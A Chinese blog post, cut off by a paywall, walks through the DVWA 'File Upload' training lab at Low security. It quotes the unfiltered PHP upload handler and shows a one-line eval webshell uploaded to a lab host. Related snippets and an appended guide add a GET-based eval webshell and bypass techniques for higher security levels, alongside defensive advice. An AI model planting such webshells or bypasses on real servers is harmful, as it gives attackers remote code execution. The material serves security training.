Dvwa练习05 File Upload 文件上传

原创 已于 2022-02-16 16:17:43 修改 · 549 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #p2p #开发语言

于 2022-02-11 22:51:27 首次发布

目的IP:192.168.142.133

本地IP:192.168.142.134

1.Security Level:Low

代码如下

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
	// Where are we going to be writing to?
	$target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
	$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

	// Can we move the file to the upload folder?
	if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
		// No
		$html .= '<pre>您的图像未上传.</pre>';
	}
	else {
		// Yes!
		$html .= "<pre>{$target_path} 上传成功!</pre>";
	}
}

?>

服务器未对上传的文件做任何的检查和处理。我尝试在本地新建一个muma.php,写入一句话木马:<?php @eval($_POST['test']);?>

(注意标点符号用英文)

将文件上传到dvwa

返回文件上传到的路径!

                                                                                                                                                                                                                                                                          &nbs

最低0.47元/天 解锁文章
Kali渗透测试之DVWA系列10——File Upload(文件上传)
浅浅的博客
06-14 6330
一、File Upload文件上传) 1、文件上传原理 File Upload,即文件上传漏洞。通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的。简单点说,就是用户直接或者通过各种绕过方式将 webshell 上传到服务器中进而执行利用。 2、文件上传漏洞前提条件...
DVWA 实验报告:5、文件上传 File Upload
看那白熊
05-16 1813
dvwa 文件上传漏洞复现
Dvwa文件上传全级别学习笔记
Mbys_Lettuce的博客
09-21 1739
文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。这种攻击方式是最为直接和有效的,“文件上传” 本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。本次实验目标为利用上传的木马文件,获取目标服务器的权限,木马文件内容为:
DVWAFile Upload任意文件上传实战
「我唯一会的和擅长的只有网络安全,如果我不能在我最擅长的事情上取得成功,那么我根本不知道,我的人生还有什么意义。」
11-27 2086
何必择地,何必择时,但问立志之真不真耳
网络安全实验-DVWA文件漏洞上传
weixin_45431475的博客
10-29 1267
网络安全实验
DVWA靶场练习(五)—— File Upload
liuzibo1024的博客
10-06 1127
文件上传漏洞是指在Web应用中,由于对上传文件的类型、内容或文件名的验证不严格,导致攻击者可以上传恶意文件(如可执行文件、脚本等)到服务器,从而可能获取服务器的控制权限。这种漏洞的危害极大,因为攻击者可以上传WebShell等恶意脚本,直接控制服务器。本实验的目标是在服务器运行用户上传的php脚本。
DVWA & File Upload文件上传最详细绕过
热门推荐
Hackpatrick的博客
08-04 2万+
DVWA的使用练习: 今天学习的内容很有意思,也很实用。 DVWA其实本质上就是一个脆弱系统,它需要的是php+mysql的环境,旨在为安全人员提供一个合法的环境用来测试自己的专业技能和工具,并且让web安全工作着深刻的理解漏洞防范和入侵的本质原理,很适合我们这种小白锻炼自己,好废话不多说。。。。。 首先DVWA环境安装: 在下载DVWA之前我们需要一个php+mysql的环境,apach...
渗透测试靶场DVWA练习
hp.puppy的博客
03-29 859
渗透测试靶场DVWA练习
文件上传漏洞——DVWA练习
Lemon's blog
08-03 1665
前言:文件上传漏洞是很常见的漏洞,也非常有趣,接下来就在DVWA靶场中边学边练。 low级别 观察源码 <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/upl...
DVWA实验-文件上传
Ping_Pig的博客
09-15 2759
我们来测试dvwa文件上传漏洞.我们先干,后分析代码 Low级别 我们发现上传界面是这样的 那我们按照要求来随便上传一个文件,我现在直接上传一个php文件,内容为 <?php phpinfo(); ?> 选择文件后点击上传可以发现页面有回显上传成功的提示和上传的路径 那么我们可以直接根据这个链接去访问下,看是否能够正常访问刚才上传成功的文件 上传成功,并...
DVWA通关攻略之文件上传
勿山几已
05-22 3810
简要介绍文件上传漏洞及其利用
DVWA靶场之文件上传通关详解
qq_62169455的博客
06-27 2524
通过查看该等级的源码,可以看到该等级对上传的文件没有任何限制和过滤,存在明显的上传漏洞,成功上传后就会显示出路径+successfully uploaded 上传失败则会提示your image was not uploaded。然后访问dvwa文件中的uploads对应的文件位置D:\phpstudy_pro\phpstudy_pro\WWW\DVWA\hackable\uploads,就可以看到刚刚上传的muma.php已经上传成功。最后使用蚁剑连接,出现如图所示界面,到这里,medium就完成了。
DVWA文件上传-菜刀工具
m0_64037702的博客
07-13 590
链接:https://pan.baidu.com/s/1jGuXh1XtLwssoEN1j3sGSA 提取码:shyh下载后解压上传文件搜集信息组成完整的后门路径菜刀中右键添加,输入收集到的后门路径,以及后门密钥点击添加。
DVWA(5)文件上传(File Upload) LOW-HIGHT 操作记录
lllllaaa111的博客
11-08 1075
利用文件上传漏洞,往目标网站中上传一句话木马,然后你就可以在本地通过蚁剑或者中国菜刀即可获取和控制整个网站目录今天带来第五期文件上传漏洞操作记录。初次接触DVWA,写下自己的操作记录,希望可以帮助每个刚接触DVWA的新手,同时希望可以提升自己的技术。注:如有操作不当的地方希望可以得到大神指导、交流。
DVWA file upload
m0_73606240的博客
01-10 320
DVWA file include
dvwaFile upload
ANDTM的博客
05-18 244
我们首先了解一下一句话木马,一句话木马的代码一般为:?eval()函数表示括号里的内容把他当做PHP语言执行,@的作用是后面的代码及时出错也不报错,这样可以不暴露我们的上传的参数(也就是upload),完后$_POST[‘upload’],upload在这里是一个全局变量,我们后期要执行的代码都要通过赋值给upload来执行。我们后期如果要用菜刀进行连接时,也需要把我们的全局变量(也就是upload)告诉菜刀。
DVWA File Upload
部分学习记录
09-22 281
low 未对上传文件进行任何过滤,可以直接上传一个shell文件shell.php,例如一句话木马,通过暴露出的路径来执行该文件,然后利用菜刀进行连接,获取服务器文件信息,利用文件管理和虚拟终端进行其他操作 medium 要求上传JPEG或者PNG格式的图片 将shell.php修改为shell.png(绕过文件类型检测),尝试利用burp抓包修改文件后缀为php(上传到服务器后的文件名),上传成功 high 查看源代码发现对文件名进行了截取,其中涉及到了strrpos()函数,就去查了一下 由于限制
DVWA--File Upload
weixin_42191656的博客
08-02 852
DVWA平台File Upload漏洞Low和Medium实验
dvwa上传php文件,DVWAFile Upload文件上传
weixin_42177768的博客
03-18 398
1、file upload文件上传,测试界面2、security=low时的上传(1)直接上传php一句话木马,没有过滤,上传成功,根据提示路径链接菜刀(2)菜刀链接,webshell拿到3、security=medium时的上传(1)直接上传php格式文件,上传失败(2)测试上传图片格式文件,上传成功(3)使用Burp Suite工具进行两次抓包,在compare中比较(4)重新上传php木马,...
DVWA靶场File upload
最新发布
07-25
### DVWA File Upload 漏洞利用方法及练习指南 DVWA(Damn Vulnerable Web Application)是一款用于安全测试和漏洞练习的靶场环境,其中的 **File Upload文件上传)漏洞** 模块模拟了开发人员在处理用户上传文件时可能存在的不安全行为。通过该模块,学习者可以掌握文件上传漏洞的基本原理、检测方法以及攻击利用方式。 #### 漏洞原理 文件上传漏洞通常出现在 Web 应用程序允许用户上传文件的功能中。如果服务器未对上传的文件类型、内容或解析方式进行有效控制,攻击者可以上传恶意脚本(如 PHP、ASP、JSP 等),并通过访问该文件在服务器上执行任意命令。文件上传漏洞的关键在于服务器如何解析上传的文件,若服务器将上传的文件当作可执行脚本处理,则可能造成严重后果 [^3]。 #### DVWA File Upload 模块设置 在 DVWA 中,File Upload 模块有不同等级的安全设置(Low、Medium、High、Impossible),分别代表不同强度的安全防护。在练习中建议从 **Low 级别** 开始尝试,逐步提升难度。 #### 利用方法 ##### 1. **Low 级别** 在 Low 级别中,服务器几乎不对上传文件进行任何检查,因此可以直接上传可执行脚本。 - 准备一个简单的 PHP 一句话木马文件,例如 `shell.php`: ```php <?php eval($_GET['cmd']); ?> ``` - 将该文件上传到服务器。 - 通过访问该文件并传入参数执行命令,例如: ``` http://127.0.0.1/dvwa/hackable/uploads/shell.php?cmd=whoami ``` ##### 2. **Medium 级别** 服务器开始对上传文件进行一定程度的检查,例如限制文件类型为图片格式(如 `.jpg`)。 - 绕过方式:将 PHP 代码嵌入图片文件中,构造一个合法的图片文件并在末尾追加 PHP 代码。 - 使用工具如 `exiftool` 修改文件名后缀为 `.php.jpg`,欺骗服务器接受。 - 利用 Burp Suite 修改上传请求中的文件名或 MIME 类型。 ##### 3. **High 级别** 服务器对上传文件进行更严格的检查,例如白名单机制、文件重命名等。 - 绕过方式:利用服务器重命名机制的漏洞,如上传 `.php` 文件时,服务器可能仅重命名主文件名但保留后缀。 - 使用 `.htaccess` 文件上传配合解析漏洞(如 Apache 的解析特性),使 `.jpg` 文件被当作 PHP 执行。 ##### 4. **Impossible 级别** 服务器采用严格的安全措施,如使用白名单验证、文件重命名、MIME 类型检查等,几乎无法被绕过。 - 该级别主要用于学习如何正确防御文件上传漏洞。 #### 练习建议 - **使用工具辅助**:Burp Suite 可用于拦截上传请求并修改文件名、MIME 类型;使用 `nc` 或 `curl` 测试上传后的脚本执行。 - **尝试不同绕过方式**:包括大小写绕过、空格绕过、双后缀绕过、路径绕过等。 - **结合其他漏洞**:如配合文件包含漏洞(File Inclusion)实现远程文件执行。 #### 安全建议 - 严格限制上传文件类型,使用白名单机制。 - 对上传文件进行重命名,避免直接使用用户提供的文件名。 - 将上传目录设置为不可执行脚本。 - 对上传文件内容进行扫描和验证(如使用图像处理库验证图片内容)。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

旧时幻梦

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值